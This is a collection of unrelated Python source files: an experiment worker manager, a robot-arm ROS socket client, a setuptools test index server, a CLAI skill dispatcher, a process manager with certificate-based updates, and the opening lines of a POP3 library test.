_TIME_TOL = 1e-5
class WorkerManager(object):
""" A Base class for a worker manager. """
def __init__(self, worker_ids):
""" Constructor. """
if hasattr(worker_ids, '__iter__'):
self.worker_ids = worker_ids
else:
self.worker_ids = list(range(worker_ids))
self.num_workers = len(self.worker_ids)
# These will be set in reset
self.experiment_designer = None
self.latest_results = None
# Reset
self.reset()
def reset(self):
""" Resets everything. """
self.experiment_designer = None
self.latest_results = [] # A list of namespaces
self._child_reset()
def _child_reset(self):
""" Child reset. """
raise NotImplementedError('Implement in a child class.')
def fetch_latest_results(self):
""" Returns the latest results. """
ret_idxs = []
for i in range(len(self.latest_results)):
if (self.latest_results[i].receive_time <=
self.experiment_designer.get_curr_spent_capital() + _TIME_TOL):
ret_idxs.append(i)
keep_idxs = [i for i in range(len(self.latest_results)) if i not in ret_idxs]
ret = [self.latest_results[i] for i in ret_idxs]
self.latest_results = [self.latest_results[i] for i in keep_idxs]
return ret
def close_all_queries(self):
""" Closes all queries. """
raise NotImplementedError('Implement in a child class.')
def set_experiment_designer(self, experiment_designer):
""" Set the experiment designer. """
self.experiment_designer = experiment_designer
def a_worker_is_free(self):
""" Returns true if a worker is free. """
raise NotImplementedError('Implement in a child class.')
def all_workers_are_free(self):
""" Returns true if all workers are free. """
raise NotImplementedError('Implement in a child class.')
def _dispatch_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches job. """
raise NotImplementedError('Implement in a child class.')
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
raise NotImplementedError('Implement in a child class.')
def get_time_distro_info(self):
""" Returns information on the time distribution. """
#pylint: disable=no-self-use
return ''
def get_poll_time_real(self):
""" Returns the poll time. """
raise NotImplementedError('Implement in a child class.')
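# Illustrative flow for a concrete manager (the designer/caller objects are assumptions,
# not defined in this module):
#   wm = SyntheticWorkerManager(num_workers=4)
#   wm.set_experiment_designer(designer)       # designer provides get_curr_spent_capital()
#   if wm.a_worker_is_free():
#     wm.dispatch_single_experiment(func_caller, qinfo)
#   finished = wm.fetch_latest_results()       # qinfos whose receive_time has passed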
# A synthetic worker manager - for simulating multiple workers ---------------------------
class SyntheticWorkerManager(WorkerManager):
""" A Worker manager for synthetic functions. Mostly to be used in simulations. """
def __init__(self, num_workers, time_distro='const', time_distro_params=None):
""" Constructor. """
self.worker_pipe = None
super(SyntheticWorkerManager, self).__init__(num_workers)
# Set up the time sampler
self.time_distro = time_distro
self.time_distro_params = time_distro_params
self.time_sampler = None
self._set_up_time_sampler()
def _set_up_time_sampler(self):
""" Set up the sampler for the time random variable. """
self.time_distro_params = Namespace() if self.time_distro_params is None else \
self.time_distro_params
if self.time_distro == 'caller_eval_cost':
pass
elif self.time_distro == 'const':
if not hasattr(self.time_distro_params, 'const_val'):
self.time_distro_params.const_val = 1
self.time_sampler = lambda num_samples: (np.ones((num_samples,)) *
self.time_distro_params.const_val)
elif self.time_distro == 'uniform':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.ub = 2.0
self.time_distro_params.lb = 0.0
ub = self.time_distro_params.ub
lb = self.time_distro_params.lb
self.time_sampler = lambda num_samples: (np.random.random((num_samples,)) *
(ub - lb) + lb)
elif self.time_distro == 'halfnormal':
if not hasattr(self.time_distro_params, 'ub'):
self.time_distro_params.sigma = np.sqrt(np.pi/2)
self.time_sampler = lambda num_samples: np.abs(np.random.normal(
scale=self.time_distro_params.sigma, size=(num_samples,)))
else:
raise NotImplementedError('Not implemented time_distro = %s yet.'%(
self.time_distro))
def _child_reset(self):
""" Child reset. """
self.worker_pipe = [[wid, 0.0] for wid in self.worker_ids]
def sort_worker_pipe(self):
""" Sorts worker pipe by finish time. """
self.worker_pipe.sort(key=lambda x: x[-1])
def a_worker_is_free(self):
""" Returns true if a worker is free. """
return self.worker_pipe[0][-1] # Always return true as this is synthetic.
def all_workers_are_free(self):
""" Returns true if all workers are free. """
return self.worker_pipe[-1][-1]
def close_all_queries(self):
""" Close all queries. """
pass
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatch experiment. """
# Set worker id and whether or not eval_time should be returned
qinfo.worker_id = worker_id # indicate which worker
qinfo = func_caller.eval_from_qinfo(qinfo, **kwargs)
if self.time_distro == 'caller_eval_cost':
qinfo.eval_time = qinfo.caller_eval_cost
else:
qinfo.eval_time = float(self.time_sampler(1))
if qinfo.eval_time is None:
eval_time = 1.0
else:
eval_time = qinfo.eval_time
qinfo.receive_time = qinfo.send_time + eval_time
# Store the result in latest_results
self.latest_results.append(qinfo)
return qinfo
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatch a single experiment. """
worker_id = self.worker_pipe[0][0]
qinfo = self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
# Sort the pipe
self.worker_pipe[0][-1] = qinfo.receive_time
self.sort_worker_pipe()
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches an entire batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
qinfo = self._dispatch_experiment(func_caller, qinfos[idx],
self.worker_pipe[idx][0], **kwargs)
self.worker_pipe[idx][-1] = qinfo.receive_time
self.sort_worker_pipe()
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return self.time_distro
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return 0.0
# Real worker manager - dispatches jobs to actual worker processes --------------------------------
class RealWorkerManager(WorkerManager):
""" A worker manager for resnet. """
# pylint: disable=attribute-defined-outside-init
def __init__(self, worker_ids, tmp_dir,
poll_time=0.5, sleep_time_after_new_process=0.5):
""" Constructor. """
super(RealWorkerManager, self).__init__(worker_ids)
self.poll_time = poll_time
self.sleep_time_after_new_process = sleep_time_after_new_process
self.tmp_dir = tmp_dir
self._rwm_set_up()
self._child_reset()
def _rwm_set_up(self):
""" Sets things up for the child. """
    # Create the result directories.
self.result_dir_names = {wid:'%s/result_%s'%(self.tmp_dir, str(wid)) for wid in
self.worker_ids}
# Create the working directories
self.working_dir_names = {wid:'%s/working_%s/tmp'%(self.tmp_dir,
str(wid)) for wid in self.worker_ids}
# Create the last receive times
self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
# Create file names
self._result_file_name = 'result.txt'
self._num_file_read_attempts = 10
# self._file_read_poll_time = 0.5 # wait for 0.5 seconds
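  # Worker protocol: each dispatched job runs func_caller.eval_from_qinfo in its own process
  # with qinfo.working_dir / qinfo.result_file pointing into tmp_dir; the manager considers a
  # worker finished once its result.txt appears, reads the value, then deletes the file and
  # the working directory before marking the worker free again.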
@classmethod
def _delete_dirs(cls, list_of_dir_names):
""" Deletes a list of directories. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
@classmethod
def _delete_and_create_dirs(cls, list_of_dir_names):
""" Deletes a list of directories and creates new ones. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
def _child_reset(self):
""" Resets child. """
# Delete/create the result and working directories.
if not hasattr(self, 'result_dir_names'): # Just for the super constructor.
return
self._delete_and_create_dirs(list(self.result_dir_names.values()))
self._delete_dirs(list(self.working_dir_names.values()))
self.free_workers = Set(self.worker_ids)
self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
self.worker_processes = {wid:None for wid in self.worker_ids}
def _get_result_file_name_for_worker(self, worker_id):
""" Computes the result file name for the worker. """
return os.path.join(self.result_dir_names[worker_id], self._result_file_name)
def _read_result_from_file(self, result_file_name):
""" Reads the result from the file name. """
#pylint: disable=bare-except
num_attempts = 0
while num_attempts < self._num_file_read_attempts:
try:
file_reader = open(result_file_name, 'r')
read_in = file_reader.read().strip()
try:
# try converting to float. If not successful, it is likely an error string.
read_in = float(read_in)
except:
pass
file_reader.close()
result = read_in
break
      except:
        # count the attempt so the retry loop terminates, and don't touch file_reader here
        # since open() itself may be what failed
        num_attempts += 1
        print('Encountered error when reading %s. Trying again.'%(result_file_name))
        time.sleep(self.poll_time)
        result = EVAL_ERROR_CODE
return result
def _read_result_from_worker_and_update(self, worker_id):
""" Reads the result from the worker. """
# Read the file
result_file_name = self._get_result_file_name_for_worker(worker_id)
val = self._read_result_from_file(result_file_name)
# Now update the relevant qinfo and put it to latest_results
qinfo = self.qinfos_in_progress[worker_id]
qinfo.val = val
qinfo.receive_time = self.experiment_designer.get_curr_spent_capital()
qinfo.eval_time = qinfo.receive_time - qinfo.send_time
if not hasattr(qinfo, 'true_val'):
qinfo.true_val = val
self.latest_results.append(qinfo)
# Update receive time
self.last_receive_times[worker_id] = qinfo.receive_time
# Delete the file.
os.remove(result_file_name)
# Delete content in a working directory.
shutil.rmtree(self.working_dir_names[worker_id])
# Add the worker to the list of free workers and clear qinfos in progress.
self.worker_processes[worker_id].terminate()
self.worker_processes[worker_id] = None
self.qinfos_in_progress[worker_id] = None
self.free_workers.add(worker_id)
def _worker_is_free(self, worker_id):
""" Checks if worker with worker_id is free. """
if worker_id in self.free_workers:
return True
worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
    if os.path.exists(worker_result_file_name):
      self._read_result_from_worker_and_update(worker_id)
      return True
else:
return False
def _get_last_receive_time(self):
""" Returns the last time we received a job. """
all_receive_times = list(self.last_receive_times.values())
return max(all_receive_times)
def a_worker_is_free(self):
""" Returns true if a worker is free. """
for wid in self.worker_ids:
if self._worker_is_free(wid):
return self._get_last_receive_time()
return None
def all_workers_are_free(self):
""" Returns true if all workers are free. """
all_are_free = True
for wid in self.worker_ids:
all_are_free = self._worker_is_free(wid) and all_are_free
if all_are_free:
return self._get_last_receive_time()
else:
return None
def _dispatch_experiment(self, func_caller, qinfo, worker_id, **kwargs):
""" Dispatches experiment to worker_id. """
#pylint: disable=star-args
if self.qinfos_in_progress[worker_id] is not None:
err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
str(self.qinfos_in_progress), str(self.free_workers))
print(err_msg)
raise ValueError('Check if worker is free before sending experiment.')
# First add all the data to qinfo
qinfo.worker_id = worker_id
qinfo.working_dir = self.working_dir_names[worker_id]
qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
# Create the working directory
os.makedirs(qinfo.working_dir)
# Dispatch the experiment in a new process
target_func = lambda: func_caller.eval_from_qinfo(qinfo, **kwargs)
self.worker_processes[worker_id] = Process(target=target_func)
self.worker_processes[worker_id].start()
time.sleep(self.sleep_time_after_new_process)
# Add the qinfo to the in progress bar and remove from free_workers
self.qinfos_in_progress[worker_id] = qinfo
self.free_workers.discard(worker_id)
def dispatch_single_experiment(self, func_caller, qinfo, **kwargs):
""" Dispatches a single experiment to a free worker. """
worker_id = self.free_workers.pop()
self._dispatch_experiment(func_caller, qinfo, worker_id, **kwargs)
def dispatch_batch_of_experiments(self, func_caller, qinfos, **kwargs):
""" Dispatches a batch of experiments. """
assert len(qinfos) == self.num_workers
for idx in range(self.num_workers):
self._dispatch_experiment(func_caller, qinfos[idx], self.worker_ids[idx], **kwargs)
def close_all_queries(self):
""" Closes all queries. """
pass
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return 'realtime'
def get_poll_time_real(self):
""" Return 0.0 as the poll time. """
return self.poll_time
|
Hiwin_RT605_ArmCommand_Socket_20190627192450.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0'  # initial value of the data to transmit
Arm_feedback = 1  # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
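# Illustrative use of the switch helper above (hypothetical values, comments only):
#   for case in switch(mode):
#       if case(1):
#           ...          # runs when mode == 1
#           break
#       if case():       # case() with no arguments always matches (default branch)
#           ...
#           break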
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
        self.s.send(msg.encode('utf-8'))  # encode as utf-8; other encodings exist, but utf-8 is fine for str
def get_recieve(self):
        data = self.s.recv(1024)  # 1024 is the receive buffer size, i.e. how many bytes to read at once
        data = data.decode('utf-8')
        return data
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission ----------##
##--------------- send arm commands over the socket ---------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm rapid/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 6  ## reset to the initial mode state
print(data)
print("Socket:", Socket)
        Socket.send(data.encode('utf-8'))  # send the command string over the socket
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports its current state
        if str(feedback_str[2]) == '48':  # F: arm is Ready and can accept the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':  # T: arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':  # 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # check the "sent" flag
        if str(feedback_str[4]) == '48':  # returns 0 (false)
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':  # returns 1 (true)
            state_feedback.SentFlag = 1
        ##--------------- send arm commands over the socket (end) -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission end --------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  ## reset to the initial mode state
    ## multithreading
    t = threading.Thread(target=socket_client)
    t.start()  # start the socket-client thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
server.py
|
"""Basic http server for tests to simulate PyPI or custom indexes
"""
import time
import threading
from setuptools.extern.six.moves import BaseHTTPServer, SimpleHTTPServer
class IndexServer(BaseHTTPServer.HTTPServer):
"""Basic single-threaded http server simulating a package index
You can use this server in unittest like this::
s = IndexServer()
s.start()
index_url = s.base_url() + 'mytestindex'
# do some test requests to the index
# The index files should be located in setuptools/tests/indexes
s.stop()
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=SimpleHTTPServer.SimpleHTTPRequestHandler):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandlerClass)
self._run = True
def start(self):
self.thread = threading.Thread(target=self.serve_forever)
self.thread.start()
def stop(self):
"Stop the server"
# Let the server finish the last request and wait for a new one.
time.sleep(0.1)
self.shutdown()
self.thread.join()
self.socket.close()
def base_url(self):
port = self.server_port
return 'http://127.0.0.1:%s/setuptools/tests/indexes/' % port
class RequestRecorder(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
requests = vars(self.server).setdefault('requests', [])
requests.append(self)
self.send_response(200, 'OK')
class MockServer(BaseHTTPServer.HTTPServer, threading.Thread):
"""
A simple HTTP Server that records the requests made to it.
"""
def __init__(self, server_address=('', 0),
RequestHandlerClass=RequestRecorder):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandlerClass)
threading.Thread.__init__(self)
self.setDaemon(True)
self.requests = []
def run(self):
self.serve_forever()
@property
def url(self):
return 'http://localhost:%(server_port)s/' % vars(self)
|
service.py
|
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import time
import threading
# itemgetter is faster than lambda functions for sorting
from operator import itemgetter
import clai.server.plugins.nlc2cmd.wa_skills as wa_skills
class Service:
def __init__(self):
pass
def __call__(self, *args, **kwargs):
# call to WA evaluators
def __compute(*args):
            # getattr does the same dynamic lookup of the skill function without eval()
            result.append(getattr(wa_skills, args[0])(args[1]))
# Extract user input
msg = args[0]
result = []
threads = []
for item in dir(wa_skills):
if 'wa_skill_processor' in item:
threads.append( threading.Thread(target=__compute, args=(item, msg)) )
for t in threads: t.start()
for t in threads: t.join()
# return wa skill with the highest confidence
return sorted(result, key=itemgetter(1), reverse=True)[0]
|
Anakin.py
|
import multiprocessing
import threading
import subprocess
import socket
import time, datetime
import logging, logging.config
import addresses
from UP import up_client
from CP import cp_utils
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('ANAKIN')
my_dummies = {5021: ['python3', 'Dummies/radio.py'],
5022: ['python3', 'Dummies/temp.py']}
# name -> (subprocess, port) GLOBAL, UNLOCKED (only the dummy-update thread should touch it)
dummy_processes = {}
# name -> (lock, shared socket) GLOBAL locked name by name
name_lock_sockets = {}
# shared lock to synchronize certificate updating and everybody else
# name -> (lock, shared cert) GLOBAL
cert_store = {'UP': [threading.Lock(), None]}
UPDATE_SLEEP = 30
MONOTORING_SLEEP = 8
RETRY_FAILURES = 5
RETRY_SLEEP = 0.2
CHUNK_SIZE = 4096
def shutdown_dummy(s, dummy, logger=logger):
try:
s.sendall(b'kill')
r = s.recv(3)
if r != b'ack':
print("This is weird, should not happen")
dummy.wait(timeout=5) #5 seconds
return True
except BrokenPipeError:
pass #maybe was already dead
except:
return False
def start_dummy(command, port, logger=logger):
    #proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    proc = subprocess.Popen(command, stdout=1, stderr=2)  # inherit the parent's stdout/stderr
attempts, success = 0, False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while attempts < RETRY_FAILURES and success == False:
attempts += 1
time.sleep(RETRY_SLEEP) # give time for setting up socket
try:
s.connect(('127.0.0.1', port))
success = True
break
except ConnectionRefusedError:
pass
if not success:
print("Unable to connect to program {} on port {}".format(command, port))
return
s.sendall(b'name')
name = str(s.recv(10), 'ascii')
name_lock_sockets[name] = (threading.Lock(), s)
dummy_processes[name] = (proc, port)
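# Dummy control protocol (as used above and in the threads below): each dummy is a
# subprocess listening on a local TCP port and answering short text commands --
# b'name' (identify), b'read' (current reading), b'id' / b'version' (for updates) and
# b'kill' (acknowledge with b'ack' and exit). The RCP thread forwards remote commands
# of the form "name|command" to the matching dummy socket.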
def thread_dispatch_rcp():
logger = logging.getLogger('ANAKIN_RCP')
logger.info('Waiting for commands')
while True:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logger.debug('Trying to bind on port %s', 5679)
s.bind(addresses.ANAKIN_RCP)
s.listen(1)
logger.debug('Waiting for connection on %s', s.getsockname())
conn, addr = s.accept()
logger.info('Received connection from %s', addr)
try:
while True:
the_query = conn.recv(16).decode('utf-8').strip()
logger.debug('Got "%s" on the pipe', the_query)
if the_query == 'quit':
break
try:
name, rest = the_query.split("|", 1)
except Exception:
conn.sendall(b'Bad format')
continue
if name not in name_lock_sockets:
conn.sendall(b'Dummy not found')
continue
lock = name_lock_sockets[name][0]
with lock:
s = name_lock_sockets[name][1]
s.sendall(bytes(rest, 'ascii'))
response = s.recv(256)
logger.debug('Responding with "%s"', response)
conn.sendall(response)
except BrokenPipeError:
logger.warning('%s disconnected without "quit"', addr)
def thread_what_mp():
logger = logging.getLogger('ANAKIN_MP')
conn = socket.create_connection(addresses.HEIMDALL_MP)
#while True:
try:
while True:
conn.sendall(b'anakin|what')
size_result = int.from_bytes(conn.recv(8), 'big')
the_query = conn.recv(size_result).decode('utf-8').strip()
logger.debug('Got "%s" on the pipe', the_query)
if the_query == 'quit':
break
try:
query_vec = the_query.split("|")
except Exception:
conn.sendall(b'Bad format')
continue
for name in query_vec:
if name not in name_lock_sockets:
conn.sendall(b'Dummy not found')
continue
lock = name_lock_sockets[name][0]
with lock:
s = name_lock_sockets[name][1]
s.sendall(b'read')
response = s.recv(256) + b'|'
logger.debug('Responding with "%s"', response)
conn.sendall(response)
time.sleep(MONOTORING_SLEEP)
except BrokenPipeError:
        logger.warning('Heimdall MP connection closed without "quit"')
def thread_dummy_update():
logger = logging.getLogger('ANAKIN_UP')
while True:
logger.info('Checking for updates')
num = 0
for name, (lock, s) in name_lock_sockets.items():
cert_lock = cert_store['UP'][0]
with cert_lock, lock:
pubkey = cert_store['UP'][1]
if not pubkey:
logger.warning('Cannot update while no UP certificates are known')
break
else:
pubkey = pubkey.public_key()
s = name_lock_sockets[name][1]
logger.debug('Get id and version from %s', name)
s.sendall(b'id')
dummy_id = s.recv(10)
logger.debug('%s -- id: %s', name, dummy_id)
s.sendall(b'version')
dummy_version = s.recv(32)
logger.debug('%s -- version: %s', name, dummy_version)
file_name = 'Dummies/{}.py'.format(name) # FIXME: not general
proc, port = dummy_processes[name]
res = up_client.try_update(dummy_id,
dummy_version,
file_name,
lambda: shutdown_dummy(s,proc),
pubkey,
logger=logger)
logger.debug('Return value: %s', res)
if res[1] == True: # There was an update
logger.info('Dummy "%s" needs to be restarted', name)
num += 1
start_dummy(my_dummies[port], port)
logger.info('Updated %s dummies', num)
time.sleep(UPDATE_SLEEP)
def thread_certificate_checking():
logger = logging.getLogger('ANAKIN_CP')
def get_pem_from_arch(what, filename, date_for_update=datetime.datetime.today()):
if date_for_update < datetime.datetime.today():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# Connect to server and send update version request
#pdb.set_trace()
try:
logger.debug('Getting new %s', what)
sock.connect(addresses.ARCHITECT_CP)
sock.sendall(bytes(what, 'utf-8'))
size = int.from_bytes(sock.recv(8), 'big')
with open(filename, 'wb') as outfile:
while size > 0:
chunk = sock.recv(CHUNK_SIZE if CHUNK_SIZE < size else size)
outfile.write(chunk)
size -= len(chunk)
logger.debug('Finished getting %s', what)
except (ConnectionRefusedError, BrokenPipeError):
logger.warning('Unable to connect to Certificate Server in %s', 'architect')
# compatibility hack
class Object(object):
pass
res = Object()
res.next_update = date_for_update
res.not_valid_after = date_for_update
return res
else:
logger.debug('Not getting new %s', what)
if what == 'CRL':
crl = cp_utils.read_crl(filename)
return crl
else:
cert = cp_utils.read_cert(filename)
return cert
# here I just want to fetch it
up_cert = get_pem_from_arch('UP', 'anakin_current_up_cert.pem')
crl_next_update = datetime.datetime.today()
while True:
cert_lock = cert_store['UP'][0]
with cert_lock:
crl = get_pem_from_arch('CRL', 'anakin_current_crl.pem', crl_next_update)
while not cp_utils.check_certificate('anakin_current_up_cert.pem', 'root_cert.pem', 'anakin_current_crl.pem'):
logger.warning('No valid UP certificate')
time.sleep(5)
up_cert = get_pem_from_arch('UP', 'anakin_current_up_cert.pem')
crl = get_pem_from_arch('CRL', 'anakin_current_crl.pem', crl.next_update)
logger.info('Got valid certificates')
cert_store['UP'][1] = up_cert
crl_next_update = crl.next_update
nearest_datetime = crl.next_update if crl.next_update < up_cert.not_valid_after else up_cert.not_valid_after
time.sleep(((nearest_datetime-datetime.datetime.today())/2).seconds)
if __name__ == '__main__':
#global dummy_processes, name_lock_sockets
#global logger
# Launch Dummies
logger.info('Start launching %s dummies', len(my_dummies))
logger.debug('Dummies dict: %s', my_dummies)
for port, cmd in my_dummies.items():
start_dummy(cmd, port)
# CP
logger.info('Starting Certificate Protocol thread')
cp = threading.Thread(target=thread_certificate_checking, args=[], daemon=True)
cp.start()
# UP
logger.info('Starting Update Protocol thread')
up = threading.Thread(target=thread_dummy_update, args=[], daemon=True)
up.start()
# RCP #todo refactorize this to use the thread for everything?
logger.info('Starting Remote Control Protocol thread')
rcp_thread = threading.Thread(target=thread_dispatch_rcp, args=[], daemon=True)
rcp_thread.start()
# MP
    logger.info('Starting Monitoring Protocol thread')
mp_thread = threading.Thread(target=thread_what_mp, args=[], daemon=True)
mp_thread.start()
#time.sleep(5000)
input("Press enter to kill them all")
logger.info('Shutting down dummies')
for dummy, port in dummy_processes.values():
dummy.terminate()
logger.debug('Dummy on port %s exited with %s return code', port, dummy.wait())
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
import threading
from unittest import TestCase, skipUnless
from test import support as test_support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
HOST = socket_helper.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
